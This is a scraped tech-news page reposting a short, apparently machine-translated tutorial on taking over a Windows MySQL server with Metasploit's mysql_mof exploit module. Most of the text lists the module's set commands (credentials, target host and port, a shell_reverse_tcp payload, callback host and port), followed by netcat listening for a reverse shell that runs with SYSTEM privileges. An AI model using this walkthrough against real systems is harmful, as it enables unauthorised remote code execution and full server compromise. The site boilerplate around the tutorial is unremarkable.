In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >
Share
Shulou(Shulou.com)06/01 Report--
In view of the promotion of http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof in the previous article
Metasploit already has the code to use this method, and the principle is still the same to generate mof files, but bounce technology can be used in metasploit, so there is no need to add additional users, as long as the other server allows access to the public network.
Use exploit/windows/mysql/mysql_mofset password xxx / / set the password to login to mysql set username xxx / / set the user logging in to mysql set rhost xxx / / set the ip address to log in set rport xxxx / / set the port number of mysql set payload windows/shell_reverse_tcp / / the bounce module set lhost xxx / / bounce to the ip address set lport xxx / / bounce to the end After the port show options / / is set up Use this command to view the setting parameters exploit / / execution
If there is no problem, that is, exploit execution
Here, we use nc to listen to the corresponding port number, and then we can receive shell, usually with system permission, because the mof file is executed by system.
Please correct the mistakes.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.